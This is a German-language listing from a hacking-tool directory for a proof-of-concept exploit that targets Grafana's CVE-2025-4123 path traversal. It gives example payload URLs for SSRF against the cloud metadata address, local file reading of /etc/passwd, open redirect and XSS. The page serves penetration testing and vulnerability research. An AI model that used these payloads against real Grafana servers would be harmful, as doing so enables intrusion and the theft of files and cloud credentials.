Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/ynsmroztas/cve-2025-4123-exploit-tool-grafana-
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungRed Teaming
GitHubynsmroztas/cve-2025-4123-exploit-tool-grafana-

CVE-2025-4123-Exploit-Tool-Grafana-

CVE-2025-4123 - Grafana-Werkzeug

Repository anzeigen
326vor 1 JahrVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-4123 - Grafana Path-Traversal-Exploit

Entwickelt von mitsec

Dies ist ein Proof-of-Concept-Exploit-Tool (PoC) für CVE-2025-4123, eine kritische Path-Traversal-Schwachstelle im /public-Endpunkt von Grafana. Der Exploit ermöglicht:

  • ✅ Server-Side Request Forgery (SSRF)
  • ✅ Local File Inclusion (LFI)
  • ✅ Open Redirect
  • ✅ Cross-Site Scripting (XSS)

🔥 Betroffen

Grafana-Instanzen, bei denen der /public/-Endpunkt codierte Pfade wie folgt fehlerhaft verarbeitet:

root@kitploit:~
/public/..%2F%5coast.pro%2F%3f%2F..%2F..

🚀 Verwendung

root@kitploit:~
python3 cve_2025_4123_exploit_mitsec_final.py

Wähle anschließend den gewünschten Modus:

  1. SSRF - Interne Dienste wie 169.254.169.254
  • LFI - Dateien wie /etc/passwd lesen
  • Open Redirect - Umleitung auf externe Domains
  • XSS - JavaScript-Injection im öffentlichen Pfad

  • 🧪 Beispiel

    root@kitploit:~
    [*] SSRF URL: http://127.0.0.1:3000/public/..%2F%5C169.254.169.254/latest/meta-data/%2F%3f%2F..%2F..
    [*] LFI URL:  http://127.0.0.1:3000/public/..%2F%5coast.pro%2F%3f%2F..%2F..%2F..%2Fetc%2Fpasswd
    [*] XSS URL:  http://127.0.0.1:3000/public/%3Cscript%3Ealert('mitsec')%3C%2Fscript%3E
    

    📄 Haftungsausschluss

    Dieser Code wird ausschließlich für Bildungs- und autorisierte Testzwecke bereitgestellt. Die unbefugte Verwendung gegen Systeme ohne Einwilligung ist illegal.


    ✍️ Autor

    • mitsec
    Tool herunterladen